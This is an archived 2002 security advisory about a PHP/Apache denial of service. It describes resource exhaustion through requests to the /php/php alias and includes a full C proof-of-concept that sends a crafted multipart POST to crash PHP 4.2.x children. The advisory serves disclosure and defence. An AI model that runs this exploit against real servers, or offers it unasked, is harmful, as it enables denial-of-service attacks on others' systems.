TUCoPS :: Web :: PHP :: web5547.htm

PHP resource exhaustion Denial of Service
23th Jul 2002 [SBWID-5547]
COMMAND

	PHP resource exhaustion Denial of Service

SYSTEMS AFFECTED

	PHP for windows rel ?

PROBLEM

	Matthew Murphy [http://www.murphy.101main.net] says :
	

	The PHP interpreter is a heavy-duty CGI EXE (or SAPI  module,  depending
	on configuration) that implements an HTML-embedded  script  language.  A
	vulnerability in PHP can be used to cause a denial of  service  in  some
	cases.
	

	PHP's install process on Apache requires a "/php/" alias to be  created,
	as  it  resolves  CGI  paths  to  a  virtual.  (e.g,  /php/php.exe   not
	C:phpphp.exe).
	

	To solve the obvious security vulnerability posed  by  allowing  PHP  to
	run from the  web,  the  development  team  added  a  cgi.force_redirect
	option that is enabled by default in Apache.
	

	However, regardless of the force_redirect value, it  is  still  possible
	to load the binary without a script path:
	

	(e.g, http://localhost/php/php)
	

	A problem exists in PHP; specifically, it does not terminate when  given
	no command-line arguments. A consistent flow of requests like the  above
	will exhaust all resources for CGI/ASAPI on the server.
	

	Exploit: http://www.murphy.101main.net/php-apache.c
	

	Compiles cleanly on WinMe with MSVC 6.0
	

	 Update (02 August 2002)

	

	Exploit by bob, bob@dtors.net
	

	/* DSR-php4.2x.c

	 * The follow is Proof Of Concept code to

	 * to reproduce the segmentation violation

	 * in PHP4.2.0 & PHP4.2.1 with Apache 1.3.26 on

	 * x86 arch. Found by Joseph S. TestaII

	 *

	 * Proof Of Concept code by bob@dtors.net

	 * [notice] child pid 10779 exit signal Segmentation fault (11)

	 * 

	 */

	

	

	#include <stdio.h>

	#include <string.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	#include <netdb.h>

	

	

	

	

	int main(int argc, char *argv[]) {

	int sock, i;

	char seg[250];

	struct in_addr addr;

	struct sockaddr_in sin;

	struct hostent *he;

	 

	

	fprintf(stdout, "\nDSR-php4.2x.c By bob. POC.[www.dtors.net]\n\n"); 

	if(argc<3) 

	  {

	   fprintf(stderr, "\nUsage : %s <host> <php file>\n\n", argv[0]);

	   exit(1);

	  } 

	

	

	if ((he=gethostbyname(argv[1])) == NULL)

	   {

	   fprintf(stderr, "ERROR: Hostname lookup failed!\n\n");

	   exit(1);

	   }

	

	sock=socket(AF_INET, SOCK_STREAM, 0);

	bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);

	sin.sin_family=AF_INET;

	sin.sin_port=htons(80);

	

	fprintf(stdout, "Connecting to %s... \n",argv[1]);

	if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)

	     {

	     fprintf(stderr, "ERROR: Connection Timed Out!\n");

	     exit(1);

	     }

	

	else {

	sleep(5);

	fprintf(stdout, "Sending headers... \n");

	sprintf(seg,"POST /%s HTTP/1.0\nContent-type: multipart/form-data; boundary=---------------------------123\nContent-length: 129\n\n-----------------------------123\nContent-Disposition: filename\n\n\nhttp://www.dtors.net\n-----------------------------123--\n\n",argv[2]);

	

	     write(sock,seg,strlen(seg));

	     

	     

	fprintf(stdout, "...headers sent! \n\n");

	fprintf(stdout, "Now check your error_log, for apache [child pid] signal(11)\n");

	close(sock);

	

	}

	}

	

SOLUTION

	 Update (24 July 2002)

	 ======

	

	Vejeta says :
	

	This does not apply when the php interpreter is  dynamically  loaded  by
	apache using the DSO interface

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH